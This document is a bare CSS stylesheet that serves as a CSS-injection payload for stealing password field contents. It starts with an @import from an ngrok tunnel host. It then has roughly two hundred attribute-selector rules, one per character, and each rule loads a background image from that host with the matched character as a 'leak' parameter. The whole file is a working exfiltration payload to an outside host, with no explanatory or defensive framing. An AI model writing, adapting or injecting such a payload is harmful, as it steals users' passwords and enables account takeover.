@import url("http://bc0a37bcf1d5.ngrok.io/?l=2");
input[type="password"][value="!"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.06961614095214896");}
input[type="password"][value="\""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.17730944147496075");}
input[type="password"][value="#"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.6642943232978589");}
input[type="password"][value="$"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.2735811794684462");}
input[type="password"][value="%"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.19962232919350198");}
input[type="password"][value="&"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.6413539326764466");}
input[type="password"][value="'"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.779483104666286");}
input[type="password"][value="("] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.3770308790931236");}
input[type="password"][value=")"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.5402388667759199");}
input[type="password"][value="*"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.9047817287764788");}
input[type="password"][value="+"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.8416265809557939");}
input[type="password"][value=","] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.4576169875327516");}
input[type="password"][value="-"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.9814097153146941");}
input[type="password"][value="."] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.1244413951189185");}
input[type="password"][value="/"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.9169301690860223");}
input[type="password"][value="0"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.3696228949599951");}
input[type="password"][value="1"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.15262327472171444");}
input[type="password"][value="2"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.7715346878855585");}
input[type="password"][value="3"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.8673508487146879");}
input[type="password"][value="4"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.4192800445191551");}
input[type="password"][value="5"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.6386252521601976");}
input[type="password"][value="6"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.9624877861626813");}
input[type="password"][value="7"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.48447677915738585");}
input[type="password"][value="8"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.037398866432642563");}
input[type="password"][value="9"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.5812348185119347");}
input[type="password"][value=":"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.4632804430014468");}
input[type="password"][value=";"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.145187345817837");}
input[type="password"][value="<"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.04402355804619984");}
input[type="password"][value="="] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.14067682724434882");}
input[type="password"][value=">"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.05097613522578426");}
input[type="password"][value="?"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.3040379997510736");}
input[type="password"][value="@"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.40309290191409297");}
input[type="password"][value="A"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.6624805268909304");}
input[type="password"][value="B"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.9612644434870528");}
input[type="password"][value="C"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.9399218706921293");}
input[type="password"][value="D"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.26452490316065025");}
input[type="password"][value="E"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.12050040663386397");}
input[type="password"][value="F"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.9656730470777868");}
input[type="password"][value="G"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.3784942069140056");}
input[type="password"][value="H"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.49761166180056393");}
input[type="password"][value="I"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.28895137930646997");}
input[type="password"][value="J"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.9977388624399215");}
input[type="password"][value="K"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.6650846042053273");}
input[type="password"][value="L"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.08470231053293364");}
input[type="password"][value="M"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.4658801459476305");}
input[type="password"][value="N"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.8730362042303992");}
input[type="password"][value="O"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.783822104043246");}
input[type="password"][value="P"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.10790553429488114");}
input[type="password"][value="Q"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.72284917318047");}
input[type="password"][value="R"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.2902674449864202");}
input[type="password"][value="S"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.19195352668112786");}
input[type="password"][value="T"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.3189880195720072");}
input[type="password"][value="U"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.16696203381455166");}
input[type="password"][value="V"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.0650794110764219");}
input[type="password"][value="W"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.318374595014822");}
input[type="password"][value="X"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.10940237233262007");}
input[type="password"][value="Y"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.4525381448121122");}
input[type="password"][value="Z"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.2523013574231219");}
input[type="password"][value="["] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.578984825126702");}
input[type="password"][value="\\"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.7279650528576906");}
input[type="password"][value="]"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.2677462066974807");}
input[type="password"][value="^"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.737597384653488");}
input[type="password"][value="_"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.9164909528816154");}
input[type="password"][value="`"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.2685855932066765");}
input[type="password"][value="a"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.16182622713726458");}
input[type="password"][value="b"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.3461157479931223");}
input[type="password"][value="c"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.14185785797082895");}
input[type="password"][value="d"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.22878401439231166");}
input[type="password"][value="e"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.10700524456682392");}
input[type="password"][value="f"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.9540914405385212");}
input[type="password"][value="g"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.4324540239872494");}
input[type="password"][value="h"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.7073690472461744");}
input[type="password"][value="i"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.6454345144598841");}
input[type="password"][value="j"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.6795505623602704");}
input[type="password"][value="k"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.09468711132574548");}
input[type="password"][value="l"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.7934572550797987");}
input[type="password"][value="m"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.5128418009231812");}
input[type="password"][value="n"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.8864701798638708");}
input[type="password"][value="o"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.05914787541595934");}
input[type="password"][value="p"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.31441904415886635");}
input[type="password"][value="q"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.24422621687059576");}
input[type="password"][value="r"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.14895645184684425");}
input[type="password"][value="s"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.8524284291833966");}
input[type="password"][value="t"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.027029654958917737");}
input[type="password"][value="u"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.4636399389212771");}
input[type="password"][value="v"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.6034403695325108");}
input[type="password"][value="w"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.2104959431430966");}
input[type="password"][value="x"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.40995355541243717");}
input[type="password"][value="y"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.5309765763464864");}
input[type="password"][value="z"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.8958427060250933");}
input[type="password"][value="{"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.43614614986312583");}
input[type="password"][value="|"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.2305398223095656");}
input[type="password"][value="}"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.7454650336371873");}
input[type="password"][value="~"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.7479102886267519");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2446912798856613");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6850838879837504");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.392755500887523");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.09567396294006825");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.20927707991889988");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.48172123488549934");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7577317375798254");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9289998211872952");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.08925520681487398");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.35108388431416926");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.13849721768931333");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8966274386430078");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9712618701661413");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.09298420571846111");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.30851112988502405");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.17358251303240668");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5720771779205742");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9574726279590906");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.917282405486892");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.49050575076988623");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7979359378883575");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5798928935888659");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9747659798347486");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8729587321638026");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8780609398637955");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6199261088119481");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5652753930354097");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.05814312646728115");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.33383277931912514");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8759350068036937");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.15141285012767458");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.17596292099548605");}
input[type="password"][value=""] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.30838587561944797");}
input[type="password"][value=" "] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.3607840260125763");}
input[type="password"][value="¡"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.10058101565928923");}
input[type="password"][value="¢"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.12200848737755643");}
input[type="password"][value="£"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.8912852830304898");}
input[type="password"][value="¤"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.4087463708236936");}
input[type="password"][value="¥"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.1091412404597607");}
input[type="password"][value="¦"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.4916760579126769");}
input[type="password"][value="§"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.2735326379155283");}
input[type="password"][value="¨"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.9521992578467484");}
input[type="password"][value="©"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.3043319451131046");}
input[type="password"][value="ª"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.4731547970179395");}
input[type="password"][value="«"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.15177976846015362");}
input[type="password"][value="¬"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.1668792339570262");}
input[type="password"][value="­"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.8712671849865545");}
input[type="password"][value="®"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.9020762183068929");}
input[type="password"][value="¯"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.12098647466777401");}
input[type="password"][value="°"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.16119421149459612");}
input[type="password"][value="±"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.33892904688041336");}
input[type="password"][value="²"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.2850313270009863");}
input[type="password"][value="³"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.1534839081847803");}
input[type="password"][value="´"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.6131347116993355");}
input[type="password"][value="µ"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.9266126465788742");}
input[type="password"][value="¶"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.5201073448030773");}
input[type="password"][value="·"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.3476058532748634");}
input[type="password"][value="¸"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.67626653390278");}
input[type="password"][value="¹"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.8249793644506735");}
input[type="password"][value="º"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.6938020538585838");}
input[type="password"][value="»"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.6252790408845657");}
input[type="password"][value="¼"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.05130578599575508");}
input[type="password"][value="½"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.3636084705705631");}
input[type="password"][value="¾"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.22689760941403758");}
input[type="password"][value="¿"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.0938617290405428");}
input[type="password"][value="À"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.5291427405980973");}
input[type="password"][value="Á"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.8734992071931722");}
input[type="password"][value="Â"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.41512645943344983");}
input[type="password"][value="Ã"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.1946809713091231");}
input[type="password"][value="Ä"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.8036191413227018");}
input[type="password"][value="Å"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.6417951467607228");}
input[type="password"][value="Æ"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.7677595440384644");}
input[type="password"][value="Ç"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.03769595679582238");}
input[type="password"][value="È"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.30123184905382994");}
input[type="password"][value="É"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.5115602296932393");}
input[type="password"][value="Ê"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.2597403590669647");}
input[type="password"][value="Ë"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.02303901521382623");}
input[type="password"][value="Ì"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.05704853683585864");}
input[type="password"][value="Í"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.05539859431690619");}
input[type="password"][value="Î"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.6269539114559177");}
input[type="password"][value="Ï"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.28851249961693193");}
input[type="password"][value="Ð"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.6115748965294245");}
input[type="password"][value="Ñ"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.04667684143302053");}
input[type="password"][value="Ò"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.5245909653679417");}
input[type="password"][value="Ó"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.19757477602522133");}
input[type="password"][value="Ô"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.9164858152535753");}
input[type="password"][value="Õ"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.7917685240644265");}
input[type="password"][value="Ö"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.48400886155897505");}
input[type="password"][value="×"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.3365149877623199");}
input[type="password"][value="Ø"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.3252136211369201");}
input[type="password"][value="Ù"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.39967912246849635");}
input[type="password"][value="Ú"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.9005773007662443");}
input[type="password"][value="Û"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.9333214796179152");}
input[type="password"][value="Ü"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.4249539911541613");}
input[type="password"][value="Ý"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.9778609932951208");}
input[type="password"][value="Þ"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.7288309116645304");}
input[type="password"][value="ß"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.6795039238266081");}
input[type="password"][value="à"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.824402527017347");}
input[type="password"][value="á"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.4124733551768669");}
input[type="password"][value="â"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.5370372424736132");}
input[type="password"][value="ã"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.37335470514607216");}
input[type="password"][value="ä"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.28601128250923447");}
input[type="password"][value="å"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.19133797674807806");}
input[type="password"][value="æ"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.09448989730203627");}
input[type="password"][value="ç"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.9313020773081868");}
input[type="password"][value="è"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.5554582669221269");}
input[type="password"][value="é"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.4712401938338273");}
input[type="password"][value="ê"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.5840532347790124");}
input[type="password"][value="ë"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.159493691816037");}
input[type="password"][value="ì"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.8359122561168542");}
input[type="password"][value="í"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.05781201990099305");}
input[type="password"][value="î"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.29148782181939503");}
input[type="password"][value="ï"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.717500627642063");}
input[type="password"][value="ð"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.5238900880332187");}
input[type="password"][value="ñ"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.07823261501580947");}
input[type="password"][value="ò"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.16694589068347332");}
input[type="password"][value="ó"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.39960426897710377");}
input[type="password"][value="ô"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.05549288534486907");}
input[type="password"][value="õ"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.5243751835844199");}
input[type="password"][value="ö"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.9384114078150887");}
input[type="password"][value="÷"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.3248315836453728");}
input[type="password"][value="ø"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.3225547890509761");}
input[type="password"][value="ù"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.812531211475177");}
input[type="password"][value="ú"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.8452237003086529");}
input[type="password"][value="û"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.3285179490394352");}
input[type="password"][value="ü"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.13075790820763977");}
input[type="password"][value="ý"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.7104398999490227");}
input[type="password"][value="þ"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.6776147287451959");}
input[type="password"][value="ÿ"] {background-image: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.570830199517486");}
